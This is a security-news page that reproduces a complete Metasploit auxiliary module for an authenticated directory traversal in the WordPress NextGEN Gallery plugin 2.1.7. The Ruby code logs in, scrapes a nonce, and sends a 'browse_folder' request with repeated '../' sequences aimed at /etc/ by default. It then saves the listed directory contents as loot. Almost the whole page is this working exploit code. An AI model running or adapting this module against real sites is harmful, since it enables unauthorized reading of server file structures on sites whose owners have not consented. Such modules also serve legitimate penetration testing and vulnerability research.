Security
Headlines
HeadlinesLatestCVEs

Headline

WordPress NextGEN Gallery Directory Read

This Metasploit module exploits an authenticated directory traversal vulnerability in WordPress Plugin “NextGEN Gallery” version 2.1.7, allowing to read arbitrary directories with the web server privileges.

Packet Storm
#vulnerability#web#js#git#wordpress#php#auth
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'json'require 'nokogiri'class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Report  include Msf::Exploit::Remote::HTTP::Wordpress  include Msf::Auxiliary::Scanner  def initialize(info = {})    super(update_info(info,      'Name'           => 'WordPress NextGEN Gallery Directory Read Vulnerability',      'Description'    => %q{        This module exploits an authenticated directory traversal vulnerability        in WordPress Plugin "NextGEN Gallery" version 2.1.7, allowing        to read arbitrary directories with the web server privileges.      },      'References'     =>        [          ['WPVDB', '8165'],          ['URL', 'http://permalink.gmane.org/gmane.comp.security.oss.general/17650']        ],      'Author'         =>        [          'Sathish Kumar', # Vulnerability Discovery          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module        ],      'License'        => MSF_LICENSE    ))    register_options(      [        OptString.new('WP_USER', [true, 'A valid username', nil]),        OptString.new('WP_PASS', [true, 'Valid password for the provided username', nil]),        OptString.new('DIRPATH', [true, 'The path to the directory to read', '/etc/']),        OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 7 ])      ])  end  def user    datastore['WP_USER']  end  def password    datastore['WP_PASS']  end  def check    check_plugin_version_from_readme('nextgen-gallery', '2.1.9')  end  def get_nonce(cookie)    res = send_request_cgi(      'uri'    => normalize_uri(wordpress_url_backend, 'admin.php'),      'method' => 'GET',      'vars_get'  => {        'page'    => 'ngg_addgallery'      },      'cookie' => cookie    )    if res && res.redirect? && res.redirection      location = res.redirection      print_status("Following redirect to #{location}")      res = send_request_cgi(        'uri'    => location,        'method' => 'GET',        'cookie' => cookie      )    end    res.body.scan(/var browse_params = {"nextgen_upload_image_sec":"(.+)"};/).flatten.first  end  def parse_paths(res)    begin      j = JSON.parse(res.body)    rescue JSON::ParserError => e      elog(e)      return []    end    html = j['html']    noko = Nokogiri::HTML(html)    links = noko.search('a')    links.collect { |e| normalize_uri("#{datastore['DIRPATH']}/#{e.text}") }  end  def run_host(ip)    vprint_status("Trying to login as: #{user}")    cookie = wordpress_login(user, password)    if cookie.nil?      print_error("Unable to login as: #{user}")      return    end    store_valid_credential(user: user, private: password, proof: cookie)    vprint_status("Trying to get nonce...")    nonce = get_nonce(cookie)    if nonce.nil?      print_error("Can not get nonce after login")      return    end    vprint_status("Got nonce: #{nonce}")    traversal = "../" * datastore['DEPTH']    filename = datastore['DIRPATH']    filename = filename[1, filename.length] if filename =~ /^\//    res = send_request_cgi(      'method'    => 'POST',      'uri'       => normalize_uri(target_uri.path),      'headers'   => {        'Referer' => "http://#{rhost}/wordpress/wp-admin/admin.php?page=ngg_addgallery",        'X-Requested-With' => 'XMLHttpRequest'      },      'vars_get'  => {        'photocrati_ajax' => '1'      },      'vars_post' => {        'nextgen_upload_image_sec' => "#{nonce}",        'action' => 'browse_folder',        'dir' => "#{traversal}#{filename}"      },      'cookie'    => cookie    )    if res && res.code == 200      paths = parse_paths(res)      vprint_line(paths * "\n")      fname = datastore['DIRPATH']      path = store_loot(        'nextgen.traversal',        'text/plain',        ip,        paths * "\n",        fname      )      print_good("File saved in: #{path}")    else      print_error("Nothing was downloaded. You can try to change the DIRPATH.")    end  endend

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution